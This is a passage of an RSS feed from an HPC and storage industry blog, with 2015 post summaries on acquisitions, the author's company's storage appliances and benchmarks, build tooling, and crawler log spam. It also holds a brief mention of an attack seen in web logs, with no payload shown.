What&amp;rsquo;s really interesting in this is that the 36+2 reference architecture makes use of 2x NVMe drives. And as you can see, they really don&amp;rsquo;t help much in the tests. This is not to say NVMe is bad; it&amp;rsquo;s not.</description>
    </item>
    
    <item>
      <title>Nominate your favorite HPC product and company for a readers choice award</title>
      <link>https://blog.scalability.org/2015/08/nominate-your-favorite-hpc-product-and-company-for-a-readers-choice-award/</link>
      <pubDate>Thu, 27 Aug 2015 15:57:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/08/nominate-your-favorite-hpc-product-and-company-for-a-readers-choice-award/</guid>
      <description>Please go here and nominate! Last year, our customer Lucera won best in Financial Services. We built the vast majority of their infrastructure, so we like to think we contributed in some manner to their success. This year, please don&amp;rsquo;t hesitate to nominate us (or second/third/etc.) for Best HPC Storage Product or Technology for the Scalable Informatics Unison product, or whatever you&amp;rsquo;d like. In addition to the nomination for Unison in storage, I put in nominations for Cadence in Financial Services, and in Data Intensive computing.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Seagate snarfs up DotHill</title>
      <link>https://blog.scalability.org/2015/08/ma-seagate-snarfs-up-dothill/</link>
      <pubDate>Wed, 19 Aug 2015 12:33:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/08/ma-seagate-snarfs-up-dothill/</guid>
      <description>The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn&amp;rsquo;t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.</description>
    </item>
    
    <item>
      <title>IPO:  Pure Storage files</title>
      <link>https://blog.scalability.org/2015/08/ipo-pure-storage-files/</link>
      <pubDate>Thu, 13 Aug 2015 13:14:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/08/ipo-pure-storage-files/</guid>
      <description>Not really an HPC/Big Data play (yet). But they have filed. The traditional array market is in a decline, and depending upon how you view it, it&amp;rsquo;s either merely a steep decline, or an out-and-out death spiral. The tier1 vendors are defending a shrinking turf against aggressive smaller and more focused players. Moreover, flash is set to overtake disk in terms of lower cost to deploy in very short order. This plays well for folks like Pure and a few others, though the market they are playing in is in decline.</description>
    </item>
    
    <item>
      <title>rebuilding our kernel build system for fun and profit</title>
      <link>https://blog.scalability.org/2015/08/rebuilding-our-kernel-build-system-for-fun-and-profit/</link>
      <pubDate>Wed, 05 Aug 2015 02:03:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/08/rebuilding-our-kernel-build-system-for-fun-and-profit/</guid>
      <description>No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn&amp;rsquo;t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.</description>
    </item>
    
    <item>
      <title>Drama at Violin Memory</title>
      <link>https://blog.scalability.org/2015/08/drama-at-violin-memory/</link>
      <pubDate>Tue, 04 Aug 2015 03:56:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/08/drama-at-violin-memory/</guid>
      <description>Violin has had a rather tumultuous time in market. Post IPO, they&amp;rsquo;ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can&amp;rsquo;t be a fun time for them. They don&amp;rsquo;t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets &amp;hellip; they will get slaughtered in the market.</description>
    </item>
    
    <item>
      <title>Scalable Informatics 13th year anniversary on Saturday</title>
      <link>https://blog.scalability.org/2015/07/scalable-informatics-13th-year-anniversary-on-saturday/</link>
      <pubDate>Thu, 30 Jul 2015 16:33:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/scalable-informatics-13th-year-anniversary-on-saturday/</guid>
      <description>We started the company on 1-August-2002. I remember arguing with a senior VP at SGI over his decision to abandon linux clusters in Feb 2001. That was the catalyst for me leaving SGI, but I was too chicken to start Scalable then. I thought I could do better than them. I went to another place for 15 months or so. Tried jumpstarting an HPC group there &amp;hellip; hired lots of folks, pursued lots of business.</description>
    </item>
    
    <item>
      <title>Been there, done that, even have a patent on it</title>
      <link>https://blog.scalability.org/2015/07/been-there-done-that-even-have-a-patent-on-it/</link>
      <pubDate>Thu, 30 Jul 2015 15:54:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/been-there-done-that-even-have-a-patent-on-it/</guid>
      <description>I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I&amp;rsquo;ve seen something like this before &amp;hellip; and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.</description>
    </item>
    
    <item>
      <title>Build debugging thoughts</title>
      <link>https://blog.scalability.org/2015/07/build-debugging-thoughts/</link>
      <pubDate>Thu, 30 Jul 2015 02:02:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/build-debugging-thoughts/</guid>
      <description>The toolchain that we use for providing up-to-date and bug-reduced versions of various tools for our appliances has a number of internal testing suites. These suites do a pretty good job of exercising code. When you build Perl, and the internal modules and tools, tests are done right then and there, as part of the module installation. Sadly, not many languages do this yet; I think Julia, R, and a few others might.</description>
    </item>
    
    <item>
      <title>Insanely awesome project and product</title>
      <link>https://blog.scalability.org/2015/07/insanely-awesome-project-and-product/</link>
      <pubDate>Tue, 28 Jul 2015 03:22:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/insanely-awesome-project-and-product/</guid>
      <description>This is one of Scalable Informatics&amp;rsquo; FastPath Unison systems &amp;hellip; well, the bottom part. The top units are clients we are using for testing.
[ ](/images/flashy.jpg)
Each of the servers at the bottom is a 4U with 54 physical 2.5 inch 6g/12g SAS or SATA SSDs. We have 5 of these units in the picture. And a number of SSDs on the way to fill them up. Think 0.2PB usable of flash.</description>
    </item>
    
    <item>
      <title>Playing &#34;guess which wire I just pulled&#34; isn&#39;t fun</title>
      <link>https://blog.scalability.org/2015/07/playing-guess-which-wire-i-just-pulled-isnt-fun/</link>
      <pubDate>Mon, 27 Jul 2015 21:51:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/playing-guess-which-wire-i-just-pulled-isnt-fun/</guid>
      <description>Even less fun when the boxes are half a world away. Yeah, this was my weekend and a large chunk of today. This will segue into another post on design and (unintended) changes in design, and end user expectations at some point. It&amp;rsquo;s hard to maintain a concept of an SLO if some of the underlying technology you are relying upon to deliver these objectives (like, I dunno, a wire?) suddenly disappears on you.</description>
    </item>
    
    <item>
      <title>M&amp;A fallout:  Cisco may have ditched Invicta after buying Whiptail</title>
      <link>https://blog.scalability.org/2015/07/ma-fallout-cisco-may-have-ditched-invicta-after-buying-whiptail/</link>
      <pubDate>Fri, 24 Jul 2015 15:20:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/ma-fallout-cisco-may-have-ditched-invicta-after-buying-whiptail/</guid>
      <description>Article is here; take it as a rumor until we hear from them. My comments: First, M&amp;amp;A is hard. You need a good fit product-wise (little overlap and great complementary functions/capabilities), and culture/people fit matters. Second, sales teams need to be on board selling complete solutions involving the acquired tech. Sometimes this doesn&amp;rsquo;t happen, for any number of reasons, some fixable, some not. Third, Cisco is out of the storage game if this is true.</description>
    </item>
    
    <item>
      <title>On storage unicorns and their likely survival or implosion</title>
      <link>https://blog.scalability.org/2015/07/on-storage-unicorns-and-their-likely-survival-or-implosion/</link>
      <pubDate>Fri, 24 Jul 2015 15:09:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/on-storage-unicorns-and-their-likely-survival-or-implosion/</guid>
      <description>The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy &amp;ldquo;standard&amp;rdquo; valuation norms, and hold onto their private status longer than those in the past. That is, they aren&amp;rsquo;t in a rush to IPO or get acquired.
The article goes on to analyze the &amp;ldquo;storage&amp;rdquo; unicorns, those in the &amp;ldquo;storage&amp;rdquo; field. They admix storage, nosql, hyperconverged, and storage as a service.</description>
    </item>
    
    <item>
      <title>Tools for linux devops: lsbond.pl</title>
      <link>https://blog.scalability.org/2015/07/tools-for-linux-devops-lsbonds-pl/</link>
      <pubDate>Tue, 21 Jul 2015 18:58:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/tools-for-linux-devops-lsbonds-pl/</guid>
      <description>Slowly and surely, I am scratching the itches I&amp;rsquo;ve had for a while with regard to data extraction from a running system. One of the big issues I deal with all the time is extracting the state and components (and their states) of a Linux network bond. It&amp;rsquo;s an annoying combination of /sys/class/net, /proc/net/bonding/, and ethtool/ip commands. So I decided to simplify it.
bond0:	mac 00:11:22:33:44:55 state up mode load balancing (xor) xmit_hash layer2+3 (2) polling 100 ms up_delay 200 ms down_delay 200 ms ipv4 10.</description>
    </item>
    
    <item>
      <title>Day job growing</title>
      <link>https://blog.scalability.org/2015/07/day-job-growing/</link>
      <pubDate>Tue, 21 Jul 2015 03:05:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/day-job-growing/</guid>
      <description>We brought on a new business development and sales manager today. Actually based in Michigan. Looking forward to great things from him, and we are all pretty excited!</description>
    </item>
    
    <item>
      <title>Gmail lossy email system</title>
      <link>https://blog.scalability.org/2015/07/gmail-lossy-email-system/</link>
      <pubDate>Tue, 21 Jul 2015 03:03:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/gmail-lossy-email-system/</guid>
      <description>For months I&amp;rsquo;ve been noting that my 2 different GMail accounts (one for work on the business side using Google Apps for Business, and yes, paid for &amp;hellip; and one for personal) are not getting all the emails sent to them. I&amp;rsquo;ve had customers reach out to me here at this site, as well as calling me up to ask if I&amp;rsquo;ve been getting their email. Seems I&amp;rsquo;m not the only one, though the complaint here appears to be a bad filter and characterization system.</description>
    </item>
    
    <item>
      <title>Baidu attack deflection</title>
      <link>https://blog.scalability.org/2015/07/baidu-attack-deflection/</link>
      <pubDate>Thu, 16 Jul 2015 04:48:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/baidu-attack-deflection/</guid>
      <description>So Baidu&amp;rsquo;s web crawler is broken. Makes the bad old days of bing bot look positively benign. Wasn&amp;rsquo;t pushing much load, but lots of log spam and it showed signs of increasing over time. So, out comes the ban hammer. Then I thought, why not report their broken bot to them. Should be as simple as an email, or a web page. Sure enough, they have links for filling out forms to indicate that their web crawler is going crazy.</description>
    </item>
    
    <item>
      <title>M&amp;A or more correctly, acqui-hire:  Cray bags much of Terascala</title>
      <link>https://blog.scalability.org/2015/07/ma-or-more-correctly-acqui-hire-cray-bags-much-of-terascala/</link>
      <pubDate>Wed, 15 Jul 2015 14:28:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/ma-or-more-correctly-acqui-hire-cray-bags-much-of-terascala/</guid>
      <description>Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales and put their code on their partners&amp;rsquo; hardware. This generated more force multipliers for them in sales, but it cost them some of their differentiation &amp;hellip; unless their boxes were entirely undifferentiated, in which case avoiding selling undifferentiated hardware would reduce their overall costs.</description>
    </item>
    
    <item>
      <title>Potential M&amp;A:  Micron being pursued</title>
      <link>https://blog.scalability.org/2015/07/potential-ma-micron-being-pursued/</link>
      <pubDate>Wed, 15 Jul 2015 14:10:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/potential-ma-micron-being-pursued/</guid>
      <description>I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential, that is)? Well, there are 4 basic Flash fabs out there these days.</description>
    </item>
    
    <item>
      <title>Fixing Baidu&#39;s broken search bot</title>
      <link>https://blog.scalability.org/2015/07/fixing-baidus-broken-search-bot/</link>
      <pubDate>Wed, 15 Jul 2015 01:44:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/fixing-baidus-broken-search-bot/</guid>
      <description>It seems that the bot was generating some effectively random broken URLs. Or maybe not so random. I saw endpoints in the logs that haven&amp;rsquo;t been in use for at least 7 years. I can&amp;rsquo;t imagine this was simply a harmless bug, as much as &amp;hellip; maybe? &amp;hellip; a search for moved/renamed endpoints? As the web server is now done very differently than in the past, the missing endpoints merely generated log spam.</description>
    </item>
    
    <item>
      <title>Blog post title of the day ... Any Sufficiently Advanced Technology ...</title>
      <link>https://blog.scalability.org/2015/07/blog-post-title-of-the-day-any-sufficiently-advanced-technology/</link>
      <pubDate>Tue, 14 Jul 2015 14:42:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/blog-post-title-of-the-day-any-sufficiently-advanced-technology/</guid>
      <description>I am a huge fan of Charles Stross&amp;rsquo;s (@cstross) Laundry series (and most of what he writes in general), and just finished his latest over the weekend. Up on his blog, he had a guest author write a post while he was stuck in traffic or similar. The title of the entry wins the internets today.
Yup, definitely a winner &amp;hellip;</description>
    </item>
    
    <item>
      <title>Most of our traffic on the day job site now comes from Baidu</title>
      <link>https://blog.scalability.org/2015/07/most-of-our-traffic-on-the-day-job-site-now-comes-from-baidu/</link>
      <pubDate>Mon, 13 Jul 2015 16:26:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/most-of-our-traffic-on-the-day-job-site-now-comes-from-baidu/</guid>
      <description>Well, their web crawler. Way, way back in the day, I complained about broken bing-bots. That was 8 years ago. Bing was fairly crappy at crawling, and seems to have improved. Google is still the lightest touch. Least impactful. Deep in the traffic noise. Not Baidu. Their bot is, for lack of a better term, broken. It&amp;rsquo;s not at DoS levels, but it is wasting traffic/resources, and providing lots of log spam.</description>
    </item>
    
    <item>
      <title>Imitation and repetition is a sincere form of flattery</title>
      <link>https://blog.scalability.org/2015/07/imitation-and-repetition-is-a-sincere-form-of-flattery/</link>
      <pubDate>Fri, 10 Jul 2015 15:28:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/imitation-and-repetition-is-a-sincere-form-of-flattery/</guid>
      <description>A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.</description>
    </item>
    
    <item>
      <title>Portable PetaByte systems update</title>
      <link>https://blog.scalability.org/2015/07/portable-petabyte-systems-update/</link>
      <pubDate>Fri, 10 Jul 2015 14:57:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/portable-petabyte-systems-update/</guid>
      <description>As a reminder, the day job has 1PB dense and fast (20GB/s and above) storage systems available for about $0.25/GB fully supported, delivered, and installed. All you need to provide is power and a network connection. I should note that we&amp;rsquo;ve delivered all-flash versions of these as well as hybrid versions for various use cases. We will have an update on these leveraging our greater density options, including 2.3PB/rack fully supported for 3 years, with shipping and installation, for under $600k USD, as well as a 1PB flash version in 1-2 racks.</description>
    </item>
    
    <item>
      <title>takes a licking and keeps on ticking</title>
      <link>https://blog.scalability.org/2015/07/takes-a-licking-and-keeps-on-ticking/</link>
      <pubDate>Mon, 06 Jul 2015 20:11:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/takes-a-licking-and-keeps-on-ticking/</guid>
      <description>One of our systems at a customer site.
$ uptime
 15:47:33 up 407 days, 3:23, 2 users, load average: 0.19, 0.10, 0.06
$ uname -r
3.10.36.scalable</description>
    </item>
    
    <item>
      <title>A new thing to occupy my time</title>
      <link>https://blog.scalability.org/2015/07/a-new-thing-to-occupy-my-time/</link>
      <pubDate>Sat, 04 Jul 2015 02:35:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/07/a-new-thing-to-occupy-my-time/</guid>
      <description>Doesn&amp;rsquo;t have to be a code golf mechanism, but this looks like fun!</description>
    </item>
    
    <item>
      <title>Thoughts on a Thursday</title>
      <link>https://blog.scalability.org/2015/06/thoughts-on-a-thursday/</link>
      <pubDate>Thu, 25 Jun 2015 22:05:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/thoughts-on-a-thursday/</guid>
      <description>We&amp;rsquo;ve been doing the startup thing for a hair under 13 years now. Most of the time we&amp;rsquo;ve been self funded, and recently we took a small investment in a friends and family round (angel.co link here). What occurs to me, after we soft announced our 100GbE results via a Mellanox PR today, is that we&amp;rsquo;ve been building the types of high performance platforms that enable end users to do bigger and better things for the whole time.</description>
    </item>
    
    <item>
      <title>Interesting conversation with a customer about our siRouter</title>
      <link>https://blog.scalability.org/2015/06/interesting-conversation-with-a-customer-about-our-sirouter/</link>
      <pubDate>Thu, 25 Jun 2015 21:50:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/interesting-conversation-with-a-customer-about-our-sirouter/</guid>
      <description>They are turning their SDN concept into one of the most incredible technologies around, a tremendous competitive advantage for them over others in their space. I had been under the impression that they were running everything on their (quite awesome) 10/40GbE switches. These are SDN capable switches from a very well funded SDN switch startup. Turns out, their SDN stack is actually running on siRouter. They are doing some very cool bits on the software stack side, and getting about 2 microseconds port to port.</description>
    </item>
    
    <item>
      <title>Our 100GbE flash storage appliance benchmarks discussed</title>
      <link>https://blog.scalability.org/2015/06/our-100gbe-flash-storage-appliance-benchmarks-discussed/</link>
      <pubDate>Thu, 25 Jun 2015 19:56:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/our-100gbe-flash-storage-appliance-benchmarks-discussed/</guid>
      <description>See the PR bit here (http://www.hpcwire.com/off-the-wire/new-mellanox-performance-benchmarks-released/ for the link impaired) This is a Unison Ceph appliance ( http://scalableinformatics.com/unison ) and they are available and shipping now. Please reach out to us if you&amp;rsquo;d like to discuss. And yes, this is the world&amp;rsquo;s first 100GbE storage appliance, or storage server SAN device if you prefer. Easily one of the fastest systems in market. [Update] Forgot to mention, this is a set of units bought by a customer, and at their site.</description>
    </item>
    
    <item>
      <title>Day job is hiring</title>
      <link>https://blog.scalability.org/2015/06/day-job-is-hiring/</link>
      <pubDate>Fri, 19 Jun 2015 03:24:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/day-job-is-hiring/</guid>
      <description>Business development/sales role for now. See here (url: https://scalableinformatics.com/bus-dev in case you don&amp;rsquo;t see the link) for more details. Prefer New York, Chicago, Boston, or nearby. No relocation.</description>
    </item>
    
    <item>
      <title>SIOS v2.0 running pxe booted</title>
      <link>https://blog.scalability.org/2015/06/sios-v2-0-running-pxe-booted/</link>
      <pubDate>Thu, 18 Jun 2015 19:59:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/sios-v2-0-running-pxe-booted/</guid>
      <description>Our SIOS (a Linux-based OS, usually based upon Debian) has just been updated for jessie (Debian 8). This was necessary to support rkt, docker, etc. in addition to our other bits. It&amp;rsquo;s been cooking in the background for a while, for, as you might have noticed from my posting frequency, I&amp;rsquo;ve been busy. But we are up and running. Base distro version here:
root@usn-ramboot:~# df -h
Filesystem  Size  Used  Avail  Use%  Mounted on
tmpfs       8.</description>
    </item>
    
    <item>
      <title>Off to Chicago for The Trading Show</title>
      <link>https://blog.scalability.org/2015/06/off-to-chicago-for-the-trading-show/</link>
      <pubDate>Mon, 01 Jun 2015 14:41:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/off-to-chicago-for-the-trading-show/</guid>
      <description>Looking forward to our booth #243 at the Trading Show in Chicago. We&amp;rsquo;ll have a FastPath Cadence time series analytics unit with us. Should be fun!</description>
    </item>
    
    <item>
      <title>M&amp;A:  Avago grabbed Broadcom, Intel grabs Altera</title>
      <link>https://blog.scalability.org/2015/06/ma-avago-grabbed-broadcom-intel-grabs-altera/</link>
      <pubDate>Mon, 01 Jun 2015 14:39:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/06/ma-avago-grabbed-broadcom-intel-grabs-altera/</guid>
      <description>Avago continues its acquisition spree. Broadcom (network chipsets and NPUs, CPUs, etc.). This is looking like a more integrated semiconductor IP play here. They grabbed LSI, and shed the non-chippery bits. They grabbed PLX. And Emulex. As they say, curiouser and curiouser. This makes perfect sense to me, and given the other acquisition announced today, I am going to bet they will be talking (at least) to Xilinx. And then there&amp;rsquo;s Intel.</description>
    </item>
    
    <item>
      <title>M&amp;A [RUMOR]:  Cisco grabs Nutanix</title>
      <link>https://blog.scalability.org/2015/05/ma-cisco-grabs-nutanix/</link>
      <pubDate>Fri, 15 May 2015 14:48:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/05/ma-cisco-grabs-nutanix/</guid>
      <description>[update] TL;DR: this appears to be rumor/speculation. One would think that such an acquisition would be prominent on Nutanix&amp;rsquo;s web site. It&amp;rsquo;s April Fools, in May. /sigh
 Huge in the hyperconverged space (which, not so curiously, is where the day job is), and it&amp;rsquo;s setting up the battle lines between the major software/hardware players. Cisco was already the number 5 hardware vendor, and was bragging about &amp;ldquo;beating the white boxes&amp;rdquo;. The last may be more wishful thinking than reality.</description>
    </item>
    
    <item>
      <title>Massive, Unapologetic Firepower: part 3, the network</title>
      <link>https://blog.scalability.org/2015/05/massive-unapologetic-firepower-part-3-the-network/</link>
      <pubDate>Mon, 04 May 2015 21:54:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/05/massive-unapologetic-firepower-part-3-the-network/</guid>
      <description>Take the world&amp;rsquo;s fastest hyperconverged storage-compute server. Mix into this the world&amp;rsquo;s fastest networking. What do you get? (hint: something you can order today)
~# iperf -c 192.168.1.1 -l128k -w 512k -P10 -t 4
------------------------------------------------------------
Client connecting to 192.168.1.1, TCP port 5001
TCP window size: 1.00 MByte (WARNING: requested 512 KByte)
------------------------------------------------------------
[ 11] local 192.168.1.2 port 50804 connected with 192.168.1.1 port 5001
[  4] local 192.168.1.2 port 50796 connected with 192.</description>
    </item>
    
    <item>
      <title>Thoughts after a small capital raise</title>
      <link>https://blog.scalability.org/2015/05/thoughts-after-a-small-capital-raise/</link>
      <pubDate>Mon, 04 May 2015 21:45:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/05/thoughts-after-a-small-capital-raise/</guid>
      <description>So the day job did a small capital raise. Not a huge amount, but helpful for some day to day stuff. We did this in part because a larger effort we were working on stalled for reasons I won&amp;rsquo;t go into here. Looking at where we are and where we need to be, I am amazed at the profound need for performance throughout the hyperconverged space, and blown away that we appear to be the only one focused upon it.</description>
    </item>
    
    <item>
      <title>diagnostics</title>
      <link>https://blog.scalability.org/2015/05/diagnostics/</link>
      <pubDate>Mon, 04 May 2015 13:31:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/05/diagnostics/</guid>
      <description>This is something of a hard post to write, for a number of reasons, not the least of which is that the topic comes as something of a surprise to me. I am just going to state it, and then discuss it. The vast majority of people (and companies) out there who think they know something of hardware/software/system level diagnostics and problem identification (from newbie to &amp;ldquo;veteran&amp;rdquo;) are either full of it, or really clueless.</description>
    </item>
    
    <item>
      <title>Been heads down working very hard on something very cool</title>
      <link>https://blog.scalability.org/2015/04/been-heads-down-working-very-hard-on-something-very-cool/</link>
      <pubDate>Thu, 30 Apr 2015 21:58:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/been-heads-down-working-very-hard-on-something-very-cool/</guid>
      <description>More soon. We&amp;rsquo;ll post here, with some basic results. Insanely cool stuff.</description>
    </item>
    
    <item>
      <title>Booth at BioIT World 15 in Boston</title>
      <link>https://blog.scalability.org/2015/04/booth-at-bioit-world-15-in-boston/</link>
      <pubDate>Tue, 21 Apr 2015 11:03:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/booth-at-bioit-world-15-in-boston/</guid>
      <description>Should be fun, we will have booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)</description>
    </item>
    
    <item>
      <title>theme updated</title>
      <link>https://blog.scalability.org/2015/04/theme-updated/</link>
      <pubDate>Tue, 21 Apr 2015 00:36:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/theme-updated/</guid>
      <description>&amp;hellip; so we don&amp;rsquo;t get lost in the mobile-geddon changes.</description>
    </item>
    
    <item>
      <title>Nebula shuts down</title>
      <link>https://blog.scalability.org/2015/04/nebula-shuts-down/</link>
      <pubDate>Wed, 01 Apr 2015 23:10:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/nebula-shuts-down/</guid>
      <description>Nebula, a cloud &amp;ldquo;appliance&amp;rdquo; (and company) has shut down. The software is open source, so their customers can pay others to provide support, or migrate to another stack. This isn&amp;rsquo;t a public cloud company, rather a private cloud company. There is little operational risk in moving from one openstack build to another. Feel free to reach out to me (landman @ scalability.org) privately if you need to speak to someone about this.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Convey snapped up by Micron</title>
      <link>https://blog.scalability.org/2015/04/ma-convey-snapped-up-by-micron/</link>
      <pubDate>Wed, 01 Apr 2015 18:36:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/ma-convey-snapped-up-by-micron/</guid>
      <description>Rich at InsideHPC has the story. This is a good fit for Micron, as they are rapidly turning into one of the stronger players in the space. As I had noted, the storage OEMs are either buying into vertical integration or partnering to make it happen. Convey is actually a natural fit given some of Micron&amp;rsquo;s other projects. The big question is: for the OEMs not going this route, or waiting to go this route, will that strategy work?</description>
    </item>
    
    <item>
      <title>Announcement of new storage appliance</title>
      <link>https://blog.scalability.org/2015/04/announcement-of-new-storage-appliance/</link>
      <pubDate>Wed, 01 Apr 2015 05:01:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/04/announcement-of-new-storage-appliance/</guid>
      <description>More information in our video (linked here in case the video doesn&amp;rsquo;t embed properly; you may need to enable flash and scripting on the page to see it embed*). Also, check out the page at the day job:
 * we don&amp;rsquo;t do google or other analytics (just local stuff here), so this shouldn&amp;rsquo;t be a security issue. Let us know if you believe otherwise.  </description>
    </item>
    
    <item>
      <title>M&amp;A:  Blekko grabbed by IBM for Watson</title>
      <link>https://blog.scalability.org/2015/03/ma-blekko-grabbed-by-ibm-for-watson/</link>
      <pubDate>Sun, 29 Mar 2015 22:52:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/ma-blekko-grabbed-by-ibm-for-watson/</guid>
      <description>Have a look at the page. Blekko was started by a number of people, including Greg Lindahl, who spent many years in the HPC world. He&amp;rsquo;s another recovering physical scientist (an astronomer, as I remember). This is interesting, as it gives a sense of where IBM sees its future. They aren&amp;rsquo;t (it looks to me) trying to compete with google; rather, they are trying to add interesting capability to Watson. They see Watson and things derived from it as their future.</description>
    </item>
    
    <item>
      <title>The world&#39;s fastest hyper-converged appliance is faster and more affordable than ever</title>
      <link>https://blog.scalability.org/2015/03/the-worlds-fastest-hyper-converged-appliance-is-faster-and-more-affordable-than-ever/</link>
      <pubDate>Mon, 16 Mar 2015 16:13:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/the-worlds-fastest-hyper-converged-appliance-is-faster-and-more-affordable-than-ever/</guid>
      <description>This is a very exciting hyper-converged system, representing our next generation of time series and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and a minimal-latency network design. This unit has been designed to deliver the maximum performance possible in as minimal a footprint &amp;hellip; both rack-wise and cost-wise &amp;hellip; as possible. You can use these as independent stand-alone units, or integrate them into a larger FastPath Unison system. We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.</description>
    </item>
    
    <item>
      <title>Interesting Q1 so far for day job</title>
      <link>https://blog.scalability.org/2015/03/interesting-q1-so-far-for-day-job/</link>
      <pubDate>Sat, 14 Mar 2015 14:29:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/interesting-q1-so-far-for-day-job/</guid>
      <description>Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I&amp;rsquo;d backed off posting intensity over the last half year or so while this was going on.</description>
    </item>
    
    <item>
      <title>Π day has come</title>
      <link>https://blog.scalability.org/2015/03/day-has-come/</link>
      <pubDate>Sat, 14 Mar 2015 14:10:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/day-has-come/</guid>
      <description>I like Π &amp;hellip; apple, cherry, etc. For those who don&amp;rsquo;t get the pun: dates in the US are often written as Month/Day/Year, with the year abbreviated to 2 digits. With this formatting, today is 3/14/15, or roughly the first 5 digits of Π, which is defined as the ratio of the circumference to the diameter of a circle on a 2D plane. You can extend the pun, by noting at 9:26.</description>
    </item>
    
    <item>
      <title>Has Alibaba been compromised?</title>
      <link>https://blog.scalability.org/2015/03/has-alibaba-been-compromised/</link>
      <pubDate>Wed, 11 Mar 2015 23:59:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/has-alibaba-been-compromised/</guid>
      <description>I saw this attack in the day job&amp;rsquo;s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba. This doesn&amp;rsquo;t mean anything in and of itself, until we look at the payload.
